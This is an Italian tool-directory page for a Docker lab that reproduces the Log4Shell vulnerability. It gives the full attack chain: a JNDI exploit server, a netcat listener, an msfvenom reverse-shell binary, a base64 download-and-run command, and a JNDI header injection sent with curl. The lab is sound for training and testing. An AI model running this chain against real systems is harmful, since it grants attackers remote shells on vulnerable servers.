Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
Strumenti/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

Vedi Repository
4144 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ambiente di riproduzione di Log4Shell

Spiegazione dell'esempio

IP della macchina vittima: 47.47.47.47

IP della macchina attaccante: 48.48.48.48

Esecuzione del Docker vulnerabile sulla macchina vittima

  • Usa il DockerFile per creare l'immagine Docker ed eseguire:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Esecuzione del Docker di attacco sulla macchina attaccante

  • Usa il DockerFile per creare l'immagine Docker ed eseguire
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Preparazione dell'ambiente della macchina attaccante

Esegui i comandi in tre shell diverse, assicurandoti che le shell rimangano attive

  • Avvia il server JDNI sulla macchina attaccante
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • Avvia il server HTTP sulla macchina attaccante
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • Metti in ascolto una porta con netcat sulla macchina attaccante
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Esecuzione dell'attacco dalla macchina attaccante

Esegui i comandi nella stessa shell

root@kitploit:~
docker exec -it attack /bin/bash
  • Prepara il file per la reverse shell sulla macchina attaccante
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Prepara il payload sulla macchina attaccante
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Invia il payload di attacco
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Generazione dei comandi

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Dimostrazione video

Video

Riferimenti

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Scarica lo strumento